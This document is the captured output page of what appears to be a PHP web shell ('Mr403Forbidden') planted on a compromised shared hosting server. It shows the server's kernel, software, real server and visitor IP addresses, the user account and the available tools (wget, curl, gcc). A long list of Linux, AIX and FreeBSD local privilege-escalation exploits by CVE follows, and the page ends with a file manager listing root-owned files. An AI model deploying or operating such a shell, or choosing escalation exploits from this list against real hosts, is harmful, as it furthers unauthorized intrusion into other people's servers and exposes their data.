./Mr403Forbidden
Information Server
System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software:LiteSpeed
PHP Version:7.4.33 PHP Os: Linux
Server IP:194.163.174.55
Your IP:216.73.216.138
User:business1 (1088) | Group: business1 (1091)
Safe Mode:OFF
MYSQL:OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
Software:
PHP Version:
Server IP:
Your IP:
User:
Safe Mode:
MYSQL:
Disable Function:
CVE N/A | Sudo prompt overflow in v1.5.7 to 1.6.5p2
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
CVE-2003-0127 | Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation
CVE-2003-0961 | Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)
CVE-2004-0077 | Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation
CVE-2004-1235 | Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)
CVE N/A | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation
CVE-2005-0736 | Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation
CVE-2005-1263 | Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow
CVE-2006-2451 | Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
CVE-2006-3626 | Linux Kernel 2.6.17.4 - 'proc' Local Privilege Escalation
CVE N/A | Compress v4.2.4 local test exploit
CVE N/A | Local GNU Awk 3.1.0-x proof of concept exploit
EDB-ID-4756 | Linux Kernel < 2.6.11.5 Bluetooth Stack Localroot Exploit
CVE-2008-0600 | Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
CVE-2008-0900 | Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
CVE-2008-4210 | Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation
CVE-2009-1185 | Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)
CVE-2009-1337 | Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation CVE-2009-2692 | Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
CVE-2009-2698 | Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
CVE-2009-3547 | Linux 2.6.x fs/pipe.c Local Privilege Escalation
CVE-2010-1146 | ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation
CVE-2010-2959 | Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation
CVE-2010-3081 | Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation
CVE-2010-3301 | Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation
CVE-2010-3437 | Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure
CVE-2010-3904 | Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
CVE-2010-4073 | Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation
CVE-2010-4258 | Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
CVE-2010-4347 | Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation CVE-2011-1021 | Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
CVE-2011-2777 | Acpid 1:
2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation
CVE-2011-1485 | pkexec - Race Condition Privilege Escalation
EDB-ID-18071 | Calibre E-Book Reader - Local Privilege Escalation
EDB-ID-17391 | Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation
EDB-ID-15944 | Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2)
CVE-2012-0056 | Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation
CVE-2012-3524 | libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation
CVE-2012-0809 | sudo 1.8.0 < 1.8.3p1 - Format String
CVE-2013-0268 | Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation
CVE-2013-1763 | Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
CVE-2013-1858 | Linux Kernel 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation
CVE-2013-2094 | Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Local Privilege Escalation (2)
CVE-2014-0038 | Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
CVE-2014-0196 | Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation
CVE-2014-3153 | Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
CVE-2014-4014 | Linux Kernel 3.13 - SGID Privilege Escalation
CVE-2014-4699 | Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation
CVE-2014-5284 | OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation CVE-2015-1328 | Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
CVE-2015-7547 | glibc - 'getaddrinfo' Stack Buffer Overflow (PoC) CVE-2016-0728 | Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)
CVE-2016-2384 | Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation
CVE-2016-5195 | Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
CVE-2016-8655 | Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit)
CVE-2016-9793 | Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation
CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()' Local Privilege Escalation
CVE-2017-6074 | Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
CVE-2017-7308 | Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
CVE-2017-7494 | Samba 3.5.0 - Remote Code Execution
CVE-2017-7533 | Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation
CVE-2017-16939 | Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
CVE-2017-16995 | Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
CVE-2017-1000112 | Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)
CVE-2017-1000367 | Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation
CVE-2018-1000001 | glibc < 2.26 - 'getcwd()' Local Privilege Escalation
CVE-2019-7304 | snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)
CVE-2019-13272 | Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation
IBM AIX
CVE-2013-4011 - IBM AIX 6.1 / 7.1 Localroot Privilege Escalation
FreeBSD
EDB-ID-1311 | FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure
CVE-2008-3531 | FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation
CVE-2008-5736 | FreeBSD 6.4 - Netgraph Privilege Escalation
CVE-2009-3527 | FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition
CVE-2009-4146 | FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation
EDB-ID-9860 | FreeBSD 7.2 - VFS/devfs Race Condition
CVE-2010-2020 | FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation
CVE-2010-2693 | FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation
CVE-2010-4210 | FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation
CVE-2011-4062 | FreeBSD - UIPC socket heap Overflow (PoC)
CVE-2011-4122 | OpenPAM - 'pam_start()' Local Privilege Escalation
CVE-2011-4862 | TelnetD encrypt_keyid - Function Pointer Overwrite
CVE-2012-0217 | FreeBSD 8.3 - 9.0 amd64 Privilege Escalation
EDB-ID-28718 | FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation
CVE-2013-2171 | FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
| Name | Type | Last Edit | Size | Owner |
Permission | Action |
| .. | ||||||
| 0645f3546752628dcadef3bbc...-. | file | 2025-04-28 17:36 | 239.35 KB | root |
s--------- | |
| 069cef921a4185bcd89567ec2...-. | file | 2026-02-20 12:41 | 69.11 KB | root |
s--------- | |
| 08cb976f4f5bd53c66bfd0363...-. | file | 2025-12-08 9:43 | 11.79 KB | root |
s--------- | |
| 0a631a062cc6531fc4dc149d3...-. | file | 2021-10-08 19:29 | 11.88 KB | root |
s--------- | |
| 145e549be9fc879bc673dc85c...-. | file | 2023-07-26 14:31 | 16.13 KB | root |
s--------- | |
| 1ffcdf62f91c84a0d95420ee7...-. | file | 2024-02-21 11:04 | 89.59 KB | root |
s--------- | |
| 2901a59f49a57ff28edb5906f...-. | file | 2025-11-06 7:45 | 12.29 KB | root |
s--------- | |
| 2bc6495a85d714647cca59194...-. | file | 2024-04-10 4:58 | 34.53 KB | root |
s--------- | |
| 34004bc2b5b5dacb8810ca8cd...-. | file | 2025-12-08 9:43 | 11.77 KB | root |
s--------- | |
| 357ef1a08b51f7c25d6a766ac...-. | file | 2025-08-20 14:37 | 409.92 KB | root |
s--------- | |
| 35bc088fbdedb1caaaaf5c49e...-. | file | 2022-03-28 15:50 | 27.55 KB | root |
s--------- | |
| 485641ee7c9f13f6d360bc0dc...-. | file | 2019-11-20 17:02 | 18.2 KB | root |
s--------- | |
| 4af163083f3b49ff41d69c11e...-. | file | 2019-10-15 13:08 | 17.68 KB | root |
s--------- | |
| 542500adff00eb2c6b5c7066d...-. | file | 2025-05-06 18:55 | 20 KB | root |
s--------- | |
| 5f795d42829190efc7bcefe90...-. | file | 2026-01-16 1:48 | 227.23 KB | root |
s--------- | |
| 8e3ef98238506423c5e092718...-. | file | 2023-07-26 14:22 | 11.61 KB | root |
s--------- | |
| 8f65442d6e1b25ccb41970173...-. | file | 2026-03-04 10:50 | 11.61 KB | root |
s--------- | |
| 9413c3677ea054401506d9691...-. | file | 2023-07-26 14:39 | 32.85 KB | root |
s--------- | |
| 964c6b535714f99f708b49377...-. | file | 2025-12-08 9:43 | 11.78 KB | root |
s--------- | |
| 9eadbf4a870f850ac0328735c...-. | file | 2025-04-28 17:36 | 11.56 KB | root |
s--------- | |
| 9fb50521e9b55c32d9729bc25...-. | file | 2025-12-08 9:43 | 15.78 KB | root |
s--------- | |
| a38417cf9ba231b953f822d3c...-. | file | 2023-06-06 14:56 | 11.6 KB | root |
s--------- | |
| aacafc4366e4abf966c8a4256...-. | file | 2025-12-08 9:43 | 11.78 KB | root |
s--------- | |
| b162faf504cd70977c6f27442...-. | file | 2023-07-26 14:31 | 11.66 KB | root |
s--------- | |
| bdcaaca2cd4c5f84d77c39668...-. | file | 2025-04-01 13:15 | 11.84 KB | root |
s--------- | |
| c39fd4ac02f3771e9c1c3e27d...-. | file | 2024-06-26 13:55 | 15.69 KB | root |
s--------- | |
| cfc6faad333df815a48bbdac1...-. | file | 2025-03-11 7:45 | 70.97 KB | root |
s--------- | |
| e0fe8e7bb2904cb716ac7a88a...-. | file | 2022-03-28 15:50 | 11.45 KB | root |
s--------- | |
| e481747b38a39a7a4b7414781...-. | file | 2024-04-10 4:58 | 16.45 KB | root |
s--------- | |
| e6b9331354fff48de3deeb674...-. | file | 2023-07-26 14:39 | 11.84 KB | root |
s--------- | |
| ef1f8fc3857f8ffe1df47070f...-. | file | 2025-12-17 18:54 | 24.14 KB | root |
s--------- | |
| ef8340e25bee9b2739ad6eb37...-. | file | 2026-02-01 23:12 | 43.57 KB | root |
s--------- | |
| fa6c4a4b534d9ace6ef1049ff...-. | file | 2025-12-08 9:43 | 231.8 KB | root |
s--------- |
© ./Mr403Forbidden